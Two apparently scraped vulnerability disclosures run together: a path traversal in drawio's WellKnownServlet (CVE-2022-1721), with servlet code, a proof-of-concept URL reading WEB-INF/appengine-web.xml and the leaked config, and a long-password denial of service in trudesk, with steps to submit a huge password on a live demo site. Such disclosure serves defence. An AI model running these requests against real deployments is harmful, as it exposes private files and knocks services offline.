            try (InputStream in = getServletContext().getResourceAsStream(uri))
            {
                if (in == null)
                {
                    response.sendError(404);
                    return;
                }
                
                byte[] buffer = new byte[8192];
                int count;
    
                while ((count = in.read(buffer)) > 0)
                {
                    response.getOutputStream().write(buffer, 0, count);
                }
                
                response.getOutputStream().flush();
                response.getOutputStream().close();
            }
    

**Proof of Concept**

Access the following URL (replace <host> with the actual host of the web application).

    <host>/.well-known/.../WEB-INF/appengine-web.xml
    

This will disclose the contents of appengine-web.xml:

    <?xml version="1.0" encoding="utf-8"?>
    <appengine-web-app xmlns="http://appengine.google.com/ns/1.0">
    
      <threadsafe>true</threadsafe>
      <sessions-enabled>false</sessions-enabled>
      <runtime>java8</runtime>
    
      
      <system-properties>
        <property name="java.util.logging.config.file" value="WEB-INF/logging.properties"/>
      </system-properties>
    
      
      <static-files>
        <include path="/**">
          <http-header name="Referrer-Policy" value="strict-origin"/>
          <http-header name="Access-Control-Allow-Origin" value="*"/>
          <http-header name="X-XSS-Protection" value="1; mode=block"/>
          <http-header name="X-Content-Type-Options" value="nosniff"/>
        </include>
      </static-files>
    
      
      <class-loader-config>
        <priority-specifier filename="cache-api-1.1.1.jar"/>
      </class-loader-config>
      
      <instance-class>F1</instance-class>
      <automatic-scaling>
        <max-idle-instances>1</max-idle-instances>
      </automatic-scaling>
    </appengine-web-app>
    

**Impact**

Read local files of the web application.

**Occurrences**

CVE-2022-1721: Path Traversal in WellKnownServlet in drawio

Allowing long password leads to denial of service in polonel/trudesk in GitHub repository polonel/trudesk prior to 1.2.2. This vulnerability can be abused by doing a DDoS attack for which genuine users will not able to access resources/applications.

Description The trudesk application allows to sending a very long password (10000000 characters) it's possible to cause a denial of service attack on the server. This may lead to the website becoming unavailable or unresponsive. Usually, this problem is caused by a vulnerable password hashing implementation. When a long password is sent, the password hashing process will result in CPU and memory exhaustion.

**Proof of Concept**

1.Go to https://docker.trudesk.io/profile paste the payload in Password parameter

2.Copy the payload from this link:- https://drive.google.com/file/d/1E3iqSQE4-t4dXpWQrDPHY7OcspHxYvYE/view?usp=sharing and paste on Password parameter

3.You will see that the application allows long password this can leads to Dos and can exploit as DDos

**Video POC :- https://drive.google.com/file/d/1d\_QV79hBqGN6GHSt5VLiranA6hO2q2W\_/view?usp=sharing****Impact**

This vulnerability can be abused by doing a DDoS attack for which genuine users will not able to access resources/applications.

Tag

#google